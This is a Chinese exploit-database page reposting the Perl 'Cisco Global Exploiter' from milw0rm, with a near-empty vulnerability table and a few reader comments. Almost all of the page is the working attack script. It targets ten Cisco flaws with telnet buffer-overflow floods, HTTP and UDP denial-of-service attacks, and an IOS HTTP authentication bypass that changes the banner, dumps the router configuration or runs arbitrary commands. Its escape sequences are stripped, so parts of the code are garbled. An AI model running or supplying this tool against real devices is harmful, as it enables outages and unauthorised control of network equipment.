Cisco – Cisco Global er Tool
漏洞ID | 1054428 | 漏洞类型 | |
发布时间 | 2004-03-28 | 更新时间 | 2004-03-28 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Hardware | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# www blackangels it
##
############
# Modules ##
############
use Socket;
use IO::Socket;
#########
# Main ##
#########
$host = "";
$expvuln = "";
$host = @ARGV[ 1 ];
$expvuln = @ARGV[ 3 ];
if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
else {
printf "nInvalid vulnerability number ...nn";
exit(1);
}
##############
# Functions ##
##############
sub usage
{
printf "nUsage :n";
printf "perl cge.pl -h <host> -v <vulnerability number>nn";
printf "Vulnerabilities list :n";
printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerabilityn";
printf "[2] - Cisco IOS Router Denial of Service Vulnerabilityn";
printf "[3] - Cisco IOS HTTP Auth Vulnerabilityn";
printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerabilityn";
printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerabilityn";
printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerabilityn";
printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerabilityn";
printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerabilityn";
printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerabilityn";
printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerabilitynn";
exit(1);
}
sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
my $serv = $host;
my $dch = "?????????????????a~ %%%%%XX%%%%%";
my $num = 30000;
my $string .= $dch x $num;
my $shc=" 15 12";
my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("No telnet server detected on $serv ...nn");
$sockd->autoflush(1);
print $sockd "$string". $shc;
while (<$sockd>){ print }
print("nPacket sent ...n");
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("Vulnerability successful exploited. Target server is down ...nn");
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
exit(1);
}
sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
my $serv = $host;
my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...nn"};
$sockd->autoflush(1);
print $sockd "GET /%% HTTP/1.0nn";
-close $sockd;
print "Packet sent ...n";
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...nn"};
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
exit(1);
}
sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
my $serv= $host;
my $n=16;
my $port=80;
my $target = inet_aton($serv);
my $fg = 0;
LAB: while ($n<100) {
my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0rnrn");
$n++;
foreach $line (@results){
$line=~ tr/A-Z/a-z/;
if ($line =~ /http/1.0 401 unauthorized/) {$fg=1;}
if ($line =~ /http/1.0 200 ok/) {$fg=0;}
}
if ($fg==1) {
sleep(2);
print "Vulnerability unsuccessful exploited ...nnr";
}
else {
sleep(2);
print "Vulnerability successful exploited with [http://$serv/level/$n/exec/....] ...nnr";
last LAB;
}
sub exploit {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Unable to initialize socket ...nn");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S);
$|=1;
print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
}
else { die("No http server detected on $serv ...nn"); }
}
}
exit(1);
}
sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
my $serv = $host;
my $n = 16;
while ($n <100) {
exploit1("GET /level/$n/exec/- HTTP/1.0nn");
$wr =~ s/n//g;
if ($wr =~ /200 ok/) {
while(1)
{ print "nVulnerability could be successful exploited. Please choose a type of attack :n";
print "[1] Banner changen";
print "[2] List vty 0 4 acl infon";
print "[3] Othern";
print "Enter a valid option [ 1 - 2 - 3 ] : ";
$vuln = <STDIN>;
chomp($vuln);
if ($vuln == 1) {
print "nEnter deface line : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0nn");
}
elsif ($vuln == 2) {
exploit1("GET /level/$n/exec/show%20conf HTTP/1.0nn");
print "$wrf";
}
elsif ($vuln == 3)
{ print "nEnter attack URL : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET /$vuln HTTP/1.0nn");
print "$wrf";
}
}
}
$wr = "";
$n++;
}
die "Vulnerability unsuccessful exploited ...nn";
sub exploit1 {
my $sockd = IO::Socket::INET -> new (
Proto => 'tcp',
PeerAddr => $serv,
PeerPort => 80,
Type => SOCK_STREAM,
Timeout => 5);
unless($sockd){die "No http server detected on $serv ...nn"}
$sockd->autoflush(1);
$sockd -> send($_[0]);
while(<$sockd>){$wr .= $_} $wrf = $wr;
close $sockd;
}
exit(1);
}
sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
my $serv = $host;
my $port = 22;
my $vuln = "a%a%a%a%a%a%a%";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No ssh server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
close($sockd);
exit(1);
}
sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET ? HTTP/1.0nn";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
sleep(2);
print "nServer response :nn";
close($sockd);
exit(1);
}
sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
my $serv = $host;
my $port = 80;
my $k = "";
print "Enter a file to read [ /show/config/cr set as default ] : ";
$k = <STDIN>;
chomp ($k);
if ($k eq "")
{$vuln = "GET /exec/show/config/cr HTTP/1.0nn";}
else
{$vuln = "GET /exec$k HTTP/1.0nn";}
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
sleep(2);
print "nServer response :nn";
while (<$sockd>){print}
close($sockd);
exit(1);
}
sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET /error?/ HTTP/1.0nn";
my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...nn";
print "Packet sent ...n";
print $sockd "$vuln";
sleep(2);
print "nServer response :nn";
while (<$sockd>){print}
close($sockd);
exit(1);
}
sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
my $ip = $host;
my $port = "514";
my $ports = "";
my $size = "";
my $i = "";
print "Input packets size : ";
$size = <STDIN>;
chomp($size);
socket(SS, PF_INET, SOCK_DGRAM, 17);
my $iaddr = inet_aton("$ip");
for ($i=0; $i<10000; $i++)
{send(SS, 0, $size, sockaddr_in($port, $iaddr));}
printf "nPackets sent ...n";
sleep(2);
printf "Please enter a server's open port : ";
$ports = <STDIN>;
chomp $ports;
printf "nNow checking server status ...n";
sleep(2);
socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...nn";
my $dest = sockaddr_in ($ports, inet_aton($ip));
connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...nn";
printf "Vulnerability unsuccessful exploited. Target server is still up ...nn";
exit(1);
}
sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
my $ip = $host;
my $vln = "%%%%%XX%%%%%";
my $num = 30000;
my $string .= $vln x $num;
my $shc=" 15 12";
my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $ip,
PeerPort => "(2002)",
) || die "Unable to connect to $ip:2002 ...nn";
$sockd->autoflush(1);
print $sockd "$string" . $shc;
while (<$sockd>){ print }
print "Packet sent ...n";
close($sockd);
sleep(1);
print("Now checking server's status ...n");
sleep(2);
my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>"(2002)",);
unless ($sockd){die "Vulnerability successful exploited. Target server is down ...nn"};
print("Vulnerability unsuccessful exploited. Target server is still up ...nn");
exit(1);
}
# milw0rm.com [2004-03-28]
iwconfig缓冲区溢出漏洞 漏洞ID 1107543 漏洞类型 缓冲区溢出 发布时间 2003-10-27 更新时间 2003-12-15 CVE编号 CVE-2003-0947 CNNVD-ID CNNVD-200312-041 漏洞平台 Linux C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666